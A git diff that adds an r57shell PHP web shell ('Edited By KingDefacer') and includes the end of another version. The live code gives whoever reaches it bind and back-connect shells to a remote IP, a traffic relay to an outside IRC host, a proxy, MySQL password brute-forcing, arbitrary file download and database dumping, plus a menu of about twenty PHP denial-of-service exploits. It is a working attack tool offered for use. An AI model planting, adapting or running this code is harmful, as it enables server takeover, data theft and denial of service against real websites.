+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
+
+echo "</td>".$fe."</tr></div></table>";
+}
+
+
+
+if(!$safe_mode && $unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id37').$table_up2.div('id37').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=50%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit exhaustion in [ pack() ] function').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF in [ unserialize() ] function').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'Limit integer calculate (65535) in ZendEngine').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [ dl() ] vulnerability').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [ preg_match() ] exhaustion resources (PHP <5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Memory_limit exhaustion in [ str_repeat() ] function (PHP <4.4.5,5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload inodes from HD.I via [ tempnam() ] (PHP 4.4.2, 5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF in [ wordwrap() ] function (PHP <4.4.2,5.1.2)').$fe);
+echo $te."</td><td valign=top width=50%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF in [ array_fill() ] function (PHP <4.4.2,5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF in [ substr_compare() ] function (PHP <4.4.2,5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Array Creation in [ unserialize() ] 64 bit function (PHP <5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF in [ str_ireplace() ] function (PHP <5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF in [ htmlentities() ] function (PHP <5.1.6,4.4.4)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'Integer Overflow in [ zip_entry_read() ] function (PHP <4.4.5)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF in [ sqlite_udf_decode_binary() ] function (PHP <4.4.5,5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'Memory Allocation BoF in [ msg_receive() ] function (PHP <4.4.5,5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'Off By One in [ php_stream_filter_create() ] function (PHP 5<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'Reference Counter Overflow in [ unserialize() ] function (PHP <4.4.4)').$fe);
+echo $te."</td></tr></div></table>";
+
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell | version ".$version." | <a href=http://alturks.com>alturks.com</a> | <a href=http://alturks.com>alturks.com</a> | <a href=http://www.alturks.com>KingDefacer</a> | Generation time: ".round(getmicrotime()-starttime,4)." ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+ ?>
diff --git a/php/r57shell2.0.php b/php/r57shell2.0.php
new file mode 100644
index 0000000..b141966
--- /dev/null
+++ b/php/r57shell2.0.php
@@ -0,0 +1,2129 @@
+
+<?php
+$language='eng';
+$auth = 0;
+$name='c5aa3124b1adad080927ce4d144c6b33';   //ronaldo
+$pass='c5aa3124b1adad080927ce4d144c6b33';   //ronaldo
+/******************************************************************************************************/
+error_reporting(0);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$safe_mode = @ini_get('safe_mode');
+$version = "2.0.20";
+if(version_compare(phpversion(), '4.1.0') == -1)
+ {
+ $_POST   = &$HTTP_POST_VARS;
+ $_GET    = &$HTTP_GET_VARS;
+ $_SERVER = &$HTTP_SERVER_VARS;
+ }
+if (@get_magic_quotes_gpc())
+ {
+ foreach ($_POST as $k=>$v)
+  {
+  $_POST[$k] = stripslashes($v);
+  }
+ foreach ($_SERVER as $k=>$v)
+  {
+  $_SERVER[$k] = stripslashes($v);
+  }
+ }
+
+if($auth == 1) {
+if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
+   {
+   header('WWW-Authenticate: Basic realm="KingDefacer"');
+   header('HTTP/1.0 401 Unauthorized');
+   exit("<b><a href=id=nobody.com>KingDefacer</a> : Access Denied</b>");
+   }
+}
+$head = '<!--                  -->
+<html>
+<head>
+<title>Edited By KingDefacer</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+
+<STYLE>
+tr {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+td {
+BORDER-RIGHT:  #aaaaaa 1px solid;
+BORDER-TOP:    #eeeeee 1px solid;
+BORDER-LEFT:   #eeeeee 1px solid;
+BORDER-BOTTOM: #aaaaaa 1px solid;
+}
+.table1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+BACKGROUND-COLOR: #D4D0C8;
+}
+.td1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+font: 7pt Verdana;
+}
+.tr1 {
+BORDER-RIGHT:  #cccccc 0px;
+BORDER-TOP:    #cccccc 0px;
+BORDER-LEFT:   #cccccc 0px;
+BORDER-BOTTOM: #cccccc 0px;
+}
+table {
+BORDER-RIGHT:  #eeeeee 1px outset;
+BORDER-TOP:    #eeeeee 1px outset;
+BORDER-LEFT:   #eeeeee 1px outset;
+BORDER-BOTTOM: #eeeeee 1px outset;
+BACKGROUND-COLOR: #D4D0C8;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+select {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+submit {
+BORDER-RIGHT:  buttonhighlight 2px outset;
+BORDER-TOP:    buttonhighlight 2px outset;
+BORDER-LEFT:   buttonhighlight 2px outset;
+BORDER-BOTTOM: buttonhighlight 2px outset;
+BACKGROUND-COLOR: #e4e0d8;
+width: 30%;
+}
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+BODY {
+margin-top: 1px;
+margin-right: 1px;
+margin-bottom: 1px;
+margin-left: 1px;
+}
+A:link {COLOR:red; TEXT-DECORATION: none}
+A:visited { COLOR:red; TEXT-DECORATION: none}
+A:active {COLOR:red; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>';
+class zipfile
+{
+    var $datasec      = array();
+    var $ctrl_dir     = array();
+    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
+    var $old_offset   = 0;
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+        if ($timearray['year'] < 1980) {
+            $timearray['year']    = 1980;
+            $timearray['mon']     = 1;
+            $timearray['mday']    = 1;
+            $timearray['hours']   = 0;
+            $timearray['minutes'] = 0;
+            $timearray['seconds'] = 0;
+        }
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+                ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+    function addFile($data, $name, $time = 0)
+    {
+        $name     = str_replace('\\', '/', $name);
+        $dtime    = dechex($this->unix2DosTime($time));
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+     	$filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+     	$mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+  	switch($this->db)
+     {
+  	 case 'MySQL':
+  	  if(empty($this->port)) { $this->port = '3306'; }
+  	  if(!function_exists('mysql_connect')) return 0;
+  	  $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+  	  if(is_resource($this->connection)) return 1;
+  	 break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+  	  if(!function_exists('mssql_connect')) return 0;
+  	  $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+  	 if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+  	case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+  	break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->num_rows=@mysql_num_rows($this->res);
+  	 $this->num_fields=@mysql_num_fields($this->res);
+  	 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+  	 @mysql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+  	 $this->num_rows=@mssql_num_rows($this->res);
+  	 $this->num_fields=@mssql_num_fields($this->res);
+  	 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+  	 @mssql_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+  	 $this->num_rows=@pg_num_rows($this->res);
+  	 $this->num_fields=@pg_num_fields($this->res);
+  	 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+  	 @pg_free_result($this->res);
+  	 if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 $this->dump[0] = '## MySQL dump';
+  	 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+  	 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+  	  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+  	  }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+  	  }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+  	 if(!$this->get_result()) return 0;
+  	 for($i=0;$i<$this->num_rows;$i++)
+  	  {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+  	  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+  	  }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+  	case 'MySQL':
+  	 return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(isset($_GET['img'])&&!empty($_GET['img']))
+ {
+ $images = array();
+ $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';
+ $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';
+ @ob_clean();
+ header("Content-type: image/gif");
+ echo base64_decode($images[$_GET['img']]);
+ die();
+ }
+if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if ($_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+
+ if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+       	echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+       	$keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
